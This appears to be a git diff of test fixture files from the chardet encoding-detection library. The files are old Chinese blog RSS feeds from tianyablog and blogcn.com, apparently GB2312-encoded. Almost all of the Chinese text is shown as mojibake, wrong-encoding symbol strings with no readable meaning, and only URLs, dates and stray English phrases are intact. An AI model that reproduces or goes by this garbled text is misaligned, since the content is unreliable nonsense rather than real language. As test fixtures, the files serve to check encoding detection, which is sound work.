-ֱֶֹ¼µֳִַָֻ°¡£¬²ֱֱֱׁ¾¦£¬׳±¾ײקׂו»¹ײ»ַ¸ױ¸ױ¿×¼¡£ -»¶׃­²־¼׃׳װ׃ֹ½ּ׃‎µִּײֲ www.podboq.com]]> - 2005-10-18 22:24:00(0) - - - - <![CDATA[׀ֲ·¼ַָוֱײֱ׀´«ײ®°ֽ½נְֶ´«]]> - forme2poopon - 2005-10-18׀ֶַ¶‏(Tuesday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=2957374&idWriter=0&Key=0 - °ֽ½נ¶װ־ׂױג¸צִך¼ֽµִֶָֻֻ÷ץֳ»׃׀²ֳ´¹²ֳש¡£ -·ײֶה°²ָׂװװף¼÷£¬־ִֻ¹ֵֹֽ°²׀÷ץ£¿ױג¾ה»°±ָ½ֽֿ¬ׂג£¬ֹֿ÷£µִ¹װ±ֳַָ·µֳִ¿´ֽ°ֽ½נµ±׳קׂ»¼‏ֲַי£¬¾ֽ÷ֳ±ֱָקֳ¥ֳֳִַֻ­¸ד¹‎µִֵ®ָֻ¶אְ´ֵ±ָׂ»ׁש¡£ -ֱםֽג£¬קׂקׁ־ׂ¾ץµֳ׀ֲ·¼ַָ±ֹׂ»׀©׀¡ֻµ³¡¾°µֳִטצ£¬ְֲֶ¾׃¶א¡£ -־ׂ¶ֱ·¼ַ±¾ץµֳ±ָ½ֿׂ‎ָָֻכ₪µִִַַ׀©׀¡ֻµ½µִ³¡¾°£¬ָֻ־ן¶װ´נ¡£ -÷ִֿ½ִדµִ־ִ±°¡¡£»בׂ»ײ±°¶ֱµִ¡£ -]]> - 2005-10-18 21:17:00(0) - - - - <![CDATA[podboq²גװײ׀£¬»¶׃­´ף¼¹גֱ]]> - forme2poopon - 2005-10-17׀ֶַׂ»(Monday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=2942485&idWriter=0&Key=0 - £ £ www.podboq.com
    £ £ 
    £ £ װ±ַ׃ֳoblogµֳִג·ׁ°ז׳צµִ£¬׃ֹ׃»¹ֳ»׃׀ױׂµ½¼¼ץײ§³ײ£¬ֻשׂװָֿ²גװׂ»ֲֿ¡£
    £ £ ׳װ¼÷¿×ֱֻׂ»¸צ·¨ֲֹׁ§ֿ°·½ֳזµִBLOG¡£
    £ £ 
    £ £ ׃ֹ׃׳½נ׃׀ֿ£¬ִ¿ַ°ײ»ִױגׁש¡£¹µֽ¨·½·¨»¹²»·ב¸»£¬ְכ־ׂµִֹטֿכ»¹±ָ½ֿװ¶¡£
    £ £ ²»¹װץׁשָֿ׳צֶנְ´װֻµ°ֹ¡£
    £ £ ]]>
    - 2005-10-17 11:19:00(0) -
    - - - <![CDATA[ײ°׃ׁ¼¯£÷׀ֲ¸ִֵמ£¬µ«ַָ´ׂ×¶װ¸¶ְֿ¾­¼ֳ£¬¹״׳¢]]> - forme2poopon - 2005-10-14׀ֶַ־ו(Friday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=2920326&idWriter=0&Key=0 - £ £ ֵף׃ׁ¸ר־ֶֽׂ¼צ¿´ֱֻׂ»¸צWEB2.0ײ°ׂµ·¢ױ¹µִֽרױ¾£¬£¨www.jobui.com£©²»ײ×µְ¼¼ץַֹֿװץֳ´׳צµִ£¬µ«·´ױ‎ַ÷ֱִֻ½²¦ַ§½ן£¬½טֱ¦´עֱ¦µִִַײײ£¬·ַ³£¸׀§¡£ְםִמ׃כִ£½־ׂ¶¼÷ָֽֿ¬£¬µ«ַֻµµ»°»¹ַ׃׀µד׀µִ¸׀¾ץ¡£־ׂׂ²¹±ֿ׳ֱֻ־ׂµִ¼עְת÷ֽׂ»µדµדֿכ·¨¸רֳַֻ¡£
    £ £ 
    £ £ ײ°ׂµ׃כ²©¿ַֽ²»ַׂ»¸צֳ¬¶£¿
    £ £ ׂװַ°ׂ²װר¾­׃׀¹‎ײ°׃ׁ¼¯ױגׁשµִֿכ·¨£¬ֿװָ»ֿײװ¹µֽ¨ַ¸·ב¸»ֱֻ¡£
    £ £ 
    £ £ µ«ַ²©¿ֽױגײײּ¹³ֿµִ·½½÷ֽװ½ְ´װ½ֿׁײ״µִ¹«ֻ¾ױ‏ײ־ַ²»ַּלֹתֿא¿ֻµִִ״£¿
    £ £ 
    £ £ ±ֿ¾¹ֿףGOOGLEִַׁש¹ְִרINTERPRENEURµִ¹«ֻ¾ָ«ְ½ח¾ֳִַֽ´¼¸¼ׂ£¬ײ׀¹תµִ¾ר´ף¶א‎ֶףׂµ¼ׂ»¹ֳ»׃׀ױגׁשµִ׀״½ף÷ֶֽרֶַ¡££¨»ע׀ם־ׂ»¹ֳ»׃׀׀ֱ¶µ½ױג¸צ²ד´־£©´ע¹₪ױ׀´BLOG¿ִַֹ·ַ³£־£ֿױµִׂ»¼‏ֲ£¬ֻשׂװ־ׂׂ²¾ֽ÷׃ּװ¥ַ²»ַׂ×½«־ׂµֳִ־ֿכ¸זֻ־ׂµִ¹«ֻ¾£¬³‎·ַ־ׂµֳִ־ֿכ¾ַֽ¹«ֻ¾µֳִ־ֿכ£¬µ«ַֿײװױגׁשµִ¹«ֻ¾ֿװָ»»¹²»¶א¡£
    £ £ 
    £ £ µ«¼ָָ»ְ´ֱֻ£¬¾ֽ²»·ֱײ§³ײׂ»ֲֿ¡£־ֿׂכָח¹´׃¸צָֻװױג¸צְ½חֹֿ°²ֹםֱ¢ֳµִ»°£¬ֿע¹«ֻ¾ױ‏ײ־ַ·‏£¬ׂעײ°ׂµ¶ר׀־³ֹֻ«ײ״ָֻ¸ס£¬ִַַ¶װָֻ׀װµִ¼שּ₪£¬ׂ²ַ¶װָֹֻתµִ²»¸÷װנָ־¡£־´ְ´µְִ½ח»ע׀םַ׀­ֽ¬ױµִ±´ת£¬ׂװ³א³ֿֿא´‎»ע׀ם²»»בֳַָ׳װ¼÷¸ָׂ׳ײ׀ֹֻ£¬£¨ֿ£ֽױג¸צ±´תװחµדµ½ְ´£©
    £ £ 
    £ £ ¶רַׂ£¬־ָֿׂ־׿׷ֵ½»ָ׀­׳קµִֶףׂµ־ִ»¯²ִֵװ־´ְ´µִ¾÷ױשײ׀₪³צ£¬£¨ָח¹ײ׀¹תױזµִַ׀³¡¾­¼ֳ¹זװעµִ»°¡££©׀­׳קµִ¹₪¾»בװ½ְ´װ½ַ¿´ף£¬¹µֽ¨µִ·½½»בװ½ְ´װ½·ב¸»£¬׳מ׀טׂ×µִַ´ף¼ׂ¶װ´‎±ֻ´ֻµִּ¬¶ָ£¬¶װ׃ֵֽ¶׃µִָֽֿ¬¡£¼´¹ַװ´ף¼ָֿׂ־×´¿¸צָֻ´´׳קµִ«¸טֱל׃ע£¬־ׂ¾¹ָ»·¢ֿײBEATװֻ¶¯µֱִל¾ָֻ־ן£¬¶¼ָֿ־×ֵַֽ¶׃µֱִ¦ֱ¿²תֹתֱֻ¯ֶֶּל¾×µִ÷¿½׀£¬¸ִ±הֱֻױ¸צְ½ח¡£ֳִַ´װֿײװָָֻֻ׳װ־£µִ±÷ע£¬׃׀ױגׁשׂ»¸צ־ֲ´׃ֲׂµֹֿ»¹ַ׀ֱִיֹֿ׃׀ֻש¹יְׂµִֵֽ¶׃£¬ֳַֻׂ²ִ¹»¸ִ±הְ½ח¡£
    £ £ 
    £ £ ¶ִׂ»°ֱֻׁ£¬ֱִִַֻֽ¸צ¹ְםׁ§ױֻµµִ»°ֱֻ£¬ֻµַ־´ְ´ֶףׂµ¶װ׃ײ×¶װ±¹₪׃¦¸ֳׂװ÷ֿ»ןְָֻ´¿´´‎£¬־ֿׂכ־ַׂׂ»¸צ÷²»´םµִ÷ֿ»ןָֻ¡£]]>
    - 2005-11-3 19:55:00(0) -
    - -
    -
    diff --git a/chardet/tests/GB2312/xy15400.blogcn.com.xml b/chardet/tests/GB2312/xy15400.blogcn.com.xml deleted file mode 100644 index 986cc24..0000000 --- a/chardet/tests/GB2312/xy15400.blogcn.com.xml +++ /dev/null @@ -1,30 +0,0 @@ - - - - - U leave me bleeding - http://xyl5400.blogcn.com - ־ֳׂ»׃׀ֲסװ¹£¬´טםָµִײ»ַׂ»׀©±¼ה¡£ - - - - - - - - - - - - - - Blogcn.com - http://www.blogcn.com - http://www.blogcn.com/v2/logo.gif - - 11¡£7 http://www.blogcn.com/User14/xyl5400/blog/26093939.html ֻ°´µפ÷ףװ´ע¸ר־ׂ¡£
    ¿ֶר÷׃הװֳ¡£
    ־ׂ׀ִַי׃׀µד³ֱײ״¡£
    ײ»ֻµ£÷¡°־ֿׂכ³×¸ט¸רִדּ‎£¡¡±
    ¡°־ׂװּ‎¡£¡±
    ¿ַֹ־ׂ³ֱִ¬ֱֻ¡£
    ¡°־ֿׂכ±§ִד¡£¡±ֻֻµ¡£
    ¡°־ׂױזµִ÷ֿכ±§ִד¡£¡±ֻֻµ¡£
    ¡°־ׂױזµִ÷°®ִד¡£¡±ֻֽ»ָ»ֻµ¡£
    ָ»÷ף־ֳַׂ¶¼³ֱִ¬¡£
    ָ»÷ףַא¨ֶ¡£
    ־ֳַׂװµח»°ְןׂ»ֶנ¿ֶ¡£
    ֿסֱ½¸צ׀¡÷¢׳׃ׂ»ׁש¿ֶ¡£
    ֽ»ָ»ֿכֶנָ‎ֳ«װרװ÷ֹ־ק°כׂ¹׀ְׁ´±¶װֻֻµ£÷¡°־ׂ°®ִד¡£¡±
    ÷ֹ־קֳָֽ»׀ְׁ´£¬ֿס¸צ׀¡÷¢׳׃ׂ»ׁש¸׀ֻ£¬ָ»÷ףְבֱקֲתֳז¡£
    ְבֱקֲתֳז¡£
    ־ֿׂכָח¹׃׀ׂ»ּל־ֳַׂ·ײ¿×£¬־ֳַׂ²»»בֵַף׃ׁ¡£
    ¶רַַ׳ָֻ¡£ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    J http://www.blogcn.com/User14/xyl5400/blog/26093815.html װׁ°ױׂ¶«־ק±£¬־ׂגײ׀·¢ֿײֱִִַֻֻ±¾±¼ַ±¾£¬׳מׂ‏ֳµִִֻ±¾±¼ַ±¾¡£ֲֳֳיֲי¡¢ֲֳֳיֲי£¬ָ«ַ¹״׃ִד¡£
    ׀´־ׂµִֽ´¿א¡¢ױץװת¡¢ֲיִ¾¡¢־ײת£¬ָ«ַ°®ִד±µִ׀ִַי¡£
    ײ½ֹֿµִ׳ײּוָװָ»׃׀׀©ײִֹ£¬µ«÷ֵ¬ֱ¦ֿכ׀´µֳ¡°ֶ®ׂ¡±¡£
    ֶ®ׂ£¬ִַװרַ־ׂ¶װִד׳ײּוµְִֶ¼¡£
    ׂ»ׂ³ׂ»ׂ³µ״¿´£¬¶װ׃ִָ£¬־ֳׂ»׃׀װֹֻ¸׀ֱֻ¡£ײ»׃׀¾×ָׁ£¡
    ־ׂ¾¹ָ»·¢ֿײֱִֻדµִ׳ײּו£¡
    ׂװַ°־ׂ¾¹ָ»¶¼ֳ»׃׀·¢ֿײ£¡־ׂװח¾ֽײ×µְִד¿´¹‎ִִַֻ±¾ֱֻ£¬ײ»ַ£¬ִד´׃־´ּב¹‎ִדµִ¸׀£¬ִדֹץײֱֱ¬ִד¿´¹‎¶¼־´װר¸זײ×־ׂ¡£
    ׂ»ײ±µ½ֿײװ£¬־ָׂװָ»ֲת»³²ֲ²ג£¬ִד²ֳ´¶¼²»װר¸זֻ־ׂ¡£
    ִד´׃־´¸זֻ־ׂ£¬ִד¶װ־ׂµִ¸׀¾ץ£¬´׃־´¸זֻ־ׂ£¬ִדµ½µ׳װץֳ´ֿכ¡£
    ֱ¬¾¾ר¶¼־¯ֽסµֳ¿ֲֵֹ¡£
    ִַד־ׂגµִֽז׀¦»°½«־ׂׂ‎ָכֶחֽ¾¡£־ׂײֱ½ס¶¼ֳ»׃׀÷ף»¡£־ׂײױ׃ֿא׀ֱִֵַֻײ»ַׂ»¾הֽז׀¦»°¡£ײ»ַ־ׂ²¢²»ֿסִד¡£־ֽׂז²»ֶנ¡£
    װִַ÷¾ֳׂװ÷ף£¬ִדװר¸זֻ־ׂ£¬ׂ²׀ם׃׀ׂ»ּל£¬ִד»בֿ²»¶־ׂµִ£¬ׂע־×־ׂ÷÷ֳ¡£
    ׀»׀»ִד°²־¿־ׂ¡£ֿײװ־ָׂװׂ×ױגֳ´ֻµ¡£µ«׃׀ׂ»ּלִִַׂ»ּל£¿ֿײװ־ׂ²ֵ·¢ֿײ²»»ב׃׀ִַׂ»ּל¡£µ«־ָׂװָ»ֳ»׃׀÷ף»¡£
    ִד¿´³צְ´ֱֲֻנ£¿ײ½ֹֿµִ׳ײּו£¬ָ«ַ־ִׂ£·ֲִדµִ¡£ַµִ£¬־ׂװר¾­÷׃ֳ׀ִµ״ָ¥ִ£·ֲִד׀ֵֹֿµִ׳ײּו£¬¾¡¹ִַ׀©׀ֵ¡×¡×ָ«ִַדֳטצֱםֽגµִֵ®ֹתµִ¡£
    ־ֻׂµֱֻ£¬ִַײ½ֹֿµִ׳ײּו»¹÷ײִֹ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ׂ»ׁשµִִּֿל http://www.blogcn.com/User14/xyl5400/blog/26042432.html ־ח÷ףֶרֿ¢ 
    ֵ¨ֵ¨µ״¡¢²ֵֹ¢ָ¥ 
    ֳװֳװ÷‎÷‎ױֵ¿×ׁ 
    ¸ױ¸ױµֳִ־־ֶֻׂ÷ץ 
    װֻ²¼ה¿´¼ִד 
    Oh, my god ,ׁׂ¾­ 
    ²»ײ×¶א¾ֳ ֳ»ֿכֶנ 
    Oh~¡¡Oh~ 
    ־ׂµ­µ­µ״ֿכ׳ִֵד 
    ִִַךִּֿל¡¡׳מ÷ףµִִַׂ»ּל 
    ִד¡¢ַבַבµ״£¬³×׳ֵ¸ט 
    ־´װר¸׀µִ־ֲָב 
    ִ£÷‎־ׂµִֻ«ׁ 
    ײױ׃ׂ²¿ֹׂװ 
    ¿×¼ׂ»¸צָֻ¿´ֳקּל 
    Oh~¡¡Oh~yeah 
    ִד·ֲֵֿ־ׂ¡¡׳ֿעַ° 
    Oh~¡¡²»¼¡­²»¼ֱֻ¡­¡­ִד¸רµִ»״ׂה 
    ־ײֳ´£¿װר¾­ֹמ¿ּµִ 
    ֿ§ֱֻ¡­¡­ֳ»׃׀װ­ׂע 
    ־ׂµִ׀ִ£¬ׁׂ¾­ֳ»׃׀ 
    ֿכֶנִדµִ¿ױֿ¶ 
    Oh  ֳ»ֿכֶנ²»ַֽ¼ַ 
    OH  ֳ»ֿכֶנִדֶַ½¾² 
    ֿכֶנֱִֻד 
    ַֿכֶנִַׁשׂ»¸צִּֿל
    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ±¼הµֳִ״ֳ http://www.blogcn.com/User14/xyl5400/blog/26042376.html ¶װ־ְׂ´ֻµ£¬¿ִֹ¸ַ¡µ±µִַױגׁש£÷־ֳׂ»׃׀ֲסװ¹£¬ײ»ַאµםֱָֻׂ»׀©±¼ה¡£
    ֽ»ָ»¼ה¾ץµֳ÷ֳװֳ££¬¹‎ָ¥¼ָָ»ׁׂ¾­³ֹ־×¹‎ָ¥£¬ַ²»ַ¾ֽ²»׃¦¸ֳװֿכ£¿¿ֹ¹‎ָ¥¾¹ָ»ׁׂ¾­³ֹ־×¹‎ָ¥¡£
    ױׂ²»»״ִַ׀©±¼ה¡£ַא´÷ִךֹ£¬־ׁׂׂ¾­¿´²»¼ֻװְִִן£¬¶רװר¾­°®¹‎µִָֻ£¬׃ײ׃¦¸ֳ·ֵװְִִן£¿
    ¡°²ֳ´׳װ׳נ£¬־ָׂ«¶¼²»ׂס£ָח¹װְ´ׂ»´־£¬־ְָׂׂ»»בׁ¡װסִד¡£¡±¡×¡×´ִֽ‏¸ס¡£
    ־ׂ÷װ¸ׂגֿא׀ֵֻ‎ׂ²׃׀²»¿°µִ¹‎ָ¥¡£¡°־ׂ°®ִד£¬µ«׃כִדֳ»׃׀¹״ֿµ¡£¡±
    ¾ףַ¿¡¢¼ב¾צ¡¢³ֱֽ´£¬ִֻײֱ¾רֽ¡£
    ־ׂײ×µְ£¬ִד´׃²»»בׂ²׃ְװ¶²»»בְם½ג£¬´׃²»ײ×µְׂ²׃ְװ¶²»»בײ×µְ£¬־ׂµִ·²»¹ֹֻם£¬·²»¹ֹֻםµ½־ֿׂײװװׂ²²»»ב£¬ׂ²²»ִ·²»¹ֹֻם¡£
    °®µֳּ«ֹמ¾ַֽױגׁשֳ´£¿¿ֹ׀¦µִַ£¬¾¹ָ»־ׂׂ²־·¨ְם½גֱםׂ»¸צָֻµִ׳װ־ׂ»ֳנ¡£
    ֻשׂװ־ֿׂײװ³°׀¦£¬³°׀¦ִדµִ²»ְם½ג²»ײ»ַ¿ֹ±¯¡£
    »ע׀ם£¬ִדֹץײֱ´׃־´¹‎־־ׂµִֿֿ¢£¬²»ֿכײ×µְ־ׂװְִִן£¬װץֳ´ׁש¡£
    µ«ױגׁש÷÷ֳ£¬־ֿׂ£ֽ׃ְװ¶²»ׂ×װֵצֳז¡£
    ִד²»ײ×µְ£¬־ֲ÷־±µִ־ׂ£¬¶¼װֳ»׃ֲֶרױ¾װִדֳזַ°¡£
    ־ׂ²»÷¦ֲֵֿ־£¬µ«־ׂ¼ײױ÷¦ֲֵ§ֽ¡£°ִדֻש´ֽ¡£
    µ±־ׂ½סּל׃ײױ¾ֶנְ´µִ±÷ע£¬±נָֻ¿´²»µ½־ׂµִֹֻ¿¡£־ׂ¶¼¿´²»¼¡£ײ»ַ£¬¼´¹ֻׁׂ¾­׃כִד־¹״£¬µ«־ָׂװ´ר׳ֵֻµִ׃°׳׃£¬»׃ײ®²»ָ¥¡£
    ײױ׃ֿא׀ֵ£¬¼´¹²»¿ּ¹ַµִ¶«־ק£¬ׂ²¿ֹׂװ׃°ֿלָֻµִׂ»ֹתׂ»ְ¡£
    ִד (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    TO VICKY http://www.blogcn.com/User14/xyl5400/blog/23529798.html     okay,now I repay(reply) you.׳עֽם־ׂµ½ֱ½µד²ֵֻ¯׳ֵ¡£־ׂׂ»ײ±װֻ¼¿¼־ׂµִֹתֳ׃׀¶אָׂ׳±»over¡£ײ»ׂ×׃׀ֻ­¡­¡­£¨²¿·ײֲװָ¥£©ְְֻכ־ׂ׃׀¶א½ײ×µְֲנ£¿¡­¡­¶װ׃ְֻֽצ£¬³‎ֱֻ¿ײ¾ו£¬»¹ׂ×׃׀²ֳ´£¿ִדֹµֲנ£¿־ײֳ´ױגֳ´־£¬ָ¥ֿכְֻ¸ֲֹן£¿ְֻׂ×ְ´ִד¶דµֱֲֳֻנ£¿אֵ£¿ִד·ׁ¾¡׀ִֻ¼ָ¥ֿכ¶װְֻֽצ׃¦׃׀µִּ¬¶ָ¸ֲֹן£¿ָֻ¾ַֽװµְָֻ£¬ֳ¿ּל¶¼װµְָֻ£¬׃׀׀©¶«־קָ¥ֿכׂ²÷ֱ־ׂגׂו¡£ָחְֻֽצ¡£ִד׃ײ²»ַ´עֻד³ֹ¸צױׁ§¼ׂ³צ±¾י²ֳ´µִ£¬ִד¹ְֻֽצװץֳ´ׁש£¿ִד²»ׂ×ָ¥ֿכְֻֽצ£¬ְֻֽצ£¬ְכֳ¿¸צָֻ¶¼÷½£¬ֳ¿ּל¶¼׃׀ׂגֽג·¢ֹת£¬¶װ׃ְֻֽצ£¬ֲֵׂ²ֳ»׃ֳ£¬׳מ÷ֳµִּ¬¶ָ¾ַֽ¡°ְֱָ¥ְםֻ£¬ְֱָ¥ֿכֻ[ױזְם£¬ֳִָ¥ױ²״]£¬ײ×µְֲנ£¿
                                                      2002.8.31    


    ÷÷ֳ׀¦µִ׀ֵ£¬ׂ²׀ם¡£µ«÷ֻֿׁאµ״»³ִמ¡£
    ־ֱֻֽׂµ±±²ֳ´ֲ¡£µ«÷ָ·¶¨־ׂ²»»בֿכְֻ¡£
    ·סװעװץֳ´»מµ½ֿײװ¡£ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ¿×ׁ§ֱֻ http://www.blogcn.com/User14/xyl5400/blog/23529247.html ²»¹‎ֽ¦¿לְײ ²»ײ×ׂװ÷ף»בװץׁש

    XH»³ֹׂ־ַֽׂ¬׀װֱµ~־׃ן
    ־ׂ²ֳ´¶¼²»¶®
    ־ִׂ‏װ¸ֻױגׁשֿכ

    ¿´µ½ׂ»ױֵ·ַ³£¸׀ָֻµִױױֶ¬,²»ײ×µְ׃ֳ¸׀ַָֻ·ס÷ֿ
    µ«־ׂµִָ·÷¸׀¶¯
    ֳ»´ם,¶װ־ְׂ´ֻµ¹·¹·¾ַּֽל¹.



    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ׳½בׂ»ֲֿמֶׂװְ´µִֹת»מ http://www.blogcn.com/User14/xyl5400/blog/22640852.html ÷ֽfasionµְִִִָּּֿ¥׳צSPA
    ֻ‎µ¹ַ÷ֿם ²»¹‎־ׂµִ½ֵָ´÷ׁק
    ¹ְ¼ֶַ¹‎ֳפ

    ֻ1ױֱֻׂ¸צֵ®ֵף׃ׁ ¾ֻµ÷ֿס־ׂ
    ָח¹²»ַ־ֳַׂ²»ִװׂ»ֶנ
    µ«־ֿׂכֿײװׂ²÷÷ֳ ׂע־×·¢ֿײֻµִ׳װֻ½
    ִך׃׳µִ־ׂ²¢²»¶®ֲ

    ֻ2ֱ³ֹֿ׃׀׳ֵֶַ²»ֶנ־ׂµִ±םַי ¿ֹ־ָׂ´÷ֶ½¾²
    ֻ־׀טµָ´‎ ÷¿ל־ׂ»בֳָֻײ×µְ
    ־ׂ±ָֻ‎׃ֵ׀דµֳ¶א ²»ַ±ָֻ‎²מ»ע²»ֿאֲֹֿֿ
    ׂ»¶¨£¡´׃ֿײװ¿×¼ֵ¬ֱ¦

    ־ֻׂµµֳ³צ׳צµֳµ½°ֹ
    Wֵ®¿´ֱֻ־ׂµִױױֶ¬÷׃פֳֶ
    ֳ»²ֳ´÷ֳ׃פֳֶµִ ־ֻׂµ
    ¿´ֱֻ־ׂ±¾ָֻֻ‎»ב¸׃פֳֶ
    ֿײװµִֵ®ֹתµװ־»°¿ֹֻµ

    ½´½´ֿײװװִֿ¾©°ֹ£¿
    ֳִַ´ָָµִּלֶר ÷¦־ׂµִ»×¶«ײ®׀׀ׂ²ְֱֵֻּ
    ׃׀µד־ִ־׃׀µדֹֻ׀ִ
    ·¢ֿײ־ׂ³₪ֱֳִַֻ´¾ֳ»¹ַ³₪²»´ף
    ַ·ס־ֳַׂ¶¼ױזױ‎¿ֽ׳װ׃ֹ£¿

    ײ®ַ°÷ֽ׀¡¶¹¶¹׳¡ֱֻ¼¸ּל
    ÷ַ£¬ױג¸צ׀¡÷¢
    ¿ל³ֹ¾«ֱֻ ׃ײ°®׃ײ÷

    ¿´ֱֻ÷ֳ¶א־ִױֲ ¸ש±¾ֳ»ּב±װ׀´
    ÷ְֱֳֻ ָֿ·ג±°ֹ 
    ²»ׂװ־×ׂג¡×¡×ִד»עױ־ׂ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ²»ִ±¶ר÷ֿ http://www.blogcn.com/User14/xyl5400/blog/22120069.html ֿׁµִ÷לֹ«
    ִֵׁז÷ֳֽ£ָ»
    ֻ­ ־¿½ו־ׂµִ³ץָ‎±´ת
    ֻ­ ¿×¼־ׂµִ·´ֵׁ
    ֿײװ־ׂ׳רװױגְן
    ¿´µ½ֻ‎־ׂ׃ײ¿´µ½¹‎ָ¥
    ְָׂ»׀´«µִֻ‎
    ֶֻ÷ץׁׂ¾­¸ִ±הµִ־ׂ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ְ§»ף http://www.blogcn.com/User14/xyl5400/blog/21947982.html ׃׀ָֻֿ§ ׃׀ָֻ³צֿײ
    ױגׂ»ײ׃׀µדֲׂ

    ´ף¼ׂ¶¼ֲמ־ׂ ׃ײ²»÷ֳֻµ²ֳ´
    ־ׂײ»ַװµָ´‎ ײױ׃»״µ½¼ֱֻׂ
    °ײֲטֳקּל»״ְ´

    ÷ֳ°ֹ÷ֳ°ֹ ¾ֽױגׁש°ֹ
    ²»¹ִד׳צ²ֳ´
    ־ׂ¾ֽװױגְן¿´׳ִֵד
    ֳז־±םַי
    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ׀¡׳ http://www.blogcn.com/User14/xyl5400/blog/20924400.html ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]> ֻµ°ֹ http://www.blogcn.com/User14/xyl5400/blog/20900736.html ֻµ־ֳִַׂךַב ־ֳִֵַׁׂז ־ֳַׂײקװ׳
    ֻµ־ֳַׂ±¯ֹֻ ־ֳַׂקצָ» ־ֳֵַַׂ»²

    ױגְןָח´ֻ°²¾² ־ׂׂ²ָח´ֻ°²¾²

    ֻש׃׀ָֻּנֳµ״׀¦ ¶ר÷ף±§װ¹

    ־ׂײ»ַ¿´¿ֽ
    ִדֻµ°ֹ ֻהָ»־ׂײ×µְִדׂ×ֻµ²ֳ´

    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    °®·טֱֻ penny http://www.blogcn.com/User14/xyl5400/blog/20832184.html ִד׀ְִן²״׳ֵ²ֳ´ָֻ
    ²»¸ׂ²ֲָ´ׂ»ײ±ֿכ²ֲ
    ָח»״ָ¥׃׀ֳ»׃׀¿ִֹ
    ־ׂ²»¹»ֽךױ
    ִד¸רµִ´׃ְ´²»¹»ֽךױ
    ִדׂ»¸צ׃ןֶר¶¼־·¨ָ·ָֿ
    ױגײײָ±·¦ַ²ֳ´ֿףױק
    ²»¿×µֶ־ׂ²»ׂ׿׵ֶ
    ־ֹׂם±ָ²»ֲֿ±נµִָֻ
    ²»ֻרֳֵ־ׂ²»ׂ×ֻרֳֵ
    ִד»״ְ´ַׂ»ײײ׀ֵָ־
    ־ֳִַׂ´µִָֿױז
    ָ¥ֻ¼¿¼ִד¶װ־ׂµִָֿױז
    »ע׀םַ¶אֳ´ֹֻ÷¦ָֻ
    ¶ר½בֲ¼ײױַֹׂ־
    ־ׂ°®·טֱֻ
    ־ׂ·טµ½׳װ¼÷ֽ´ׂ²²»ֿ‏µֳ
    ·ֵֶתֱֻ±£»₪׳װ¼÷µִװנָ־
    ·ֵֶתֱֻµײ¿¹´אָץµִּל·
    ־ׂ²»¹ֱֻ
    ־ׂ²»¹ױגֹֻ¿ִ²»ִ׃ת÷ֿ
    ׁ¡װסֱִֻדׂ²׀םַ´םµִָֻ
    ׁ¡װס°ֱִָֻדµִ²»°²·ײ
    ־ׂ׳נײ״־ׂµִׁ¡װס

    ־ֿׂכ־ׂ·טֱֻ
    ²»¿×µֶ־ׂ²»ׂ׿׵ֶ
    ־ֹׂם±ָ²»ֲֿ±נµִָֻ
    ²»ֻרֳֵ־ׂ²»ׂ×ֻרֳֵ
    ִד»״ְ´ַׂ»ײײ¿ִֹ
    ־ֳִַׂ´µִָֿױז
    ָ¥ֻ¼¿¼ִד¶װ־ׂµִָֿױז
    »ע׀םַ¶אֳ´ֹֻ÷¦ָֻ
    ¶ר½בֲ¼ײױַֹׂ־
    ־ׂ°®·טֱֻ
    ־ׂ·טµ½׳װ¼÷ֽ´ׂ²²»ֿ‏µֳ
    ·ֵֶתֱֻ±£»₪׳װ¼÷µִװנָ־
    ·ֵֶתֱֻµײ¿¹´אָץµִּל·
    ־ׂ²»¹ֱֻ
    ־ׂ²»¹ױגֹֻ¿ִ²»ִ׃ת÷ֿ
    ׁ¡װסֱִֻדׂ²׀םַ´םµִָֻ
    ׁ¡װס°ֱִָֻדµִ²»°²·ײ
    ־ׂ׳נײ״־ׂµִׁ¡װס

    ־ֿׂכ־ׂ·טֱֻ
    ַכ׳נײ״־ׂµִׁ¡װס
    ־ֿׂכ־ׂ
    ·טֱֻ
    ַכ׳נײ״־ׂµִׁ¡װס
    ־ֿׂכ־ׂ
    ·טֱֻ


    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ³ֳװח http://www.blogcn.com/User14/xyl5400/blog/20769094.html
    ³ֳװח
    µ½÷ףְ´²ֵ·¢ֿײ°®ִדַׂ»ײײֿ°¹ ־ׁׂ§»ב÷ִֽדֻµׂ»ׁשµִ»ׁ
    ִד׳ַׂ×־ׂװִדֹםֵװ ֻµ׀ׂ¸£¸ֳַ²ֳ´ִ£ׁש
    ִד¸ר־ׂµִּלֳּ ֶהµַׂ»ֶ¬»ֱִ¹
    ׂ×ַ־ׂװח¿ֹׂװ÷ִֽדׂ»µ¶ֱ½¶ֿ ־ֳַׂ¾ֽ²»±״װ°®ְןֳדַ¿
    ¿ַֹ־ׂױזµִ²»¹»׃ֲ¸ׂ ׳־×ִדל‏ל‎־×ִד׀ִָם
    ±ֿ¾¹ֿא°®ׂ»³¡ ²»ׂ×ֻ­׀ְִן´ר׳ֵֹֻ
        ־ׂ¿ֹׂװ׃ְװ¶׀¦׳ֵ°חִׁדµִֵה½ַ װִדµִ±³÷ף׳װ¼÷¼ו°¾
    ָח¹ִד²»ֿכׂ× ׂ×ֻֽ³צׂ׳ֳװח ־ֳׂ»׃׀·ַׂ×ׂ»ֶנµ½ְֿ
    ־ׂ¿ֹׂװ²»־¸׀¾ץ¼ּ׀ר־×°®ּײ÷ֳ ְהׁµ״¿´׳ִֵדµִ½¾°ֱ
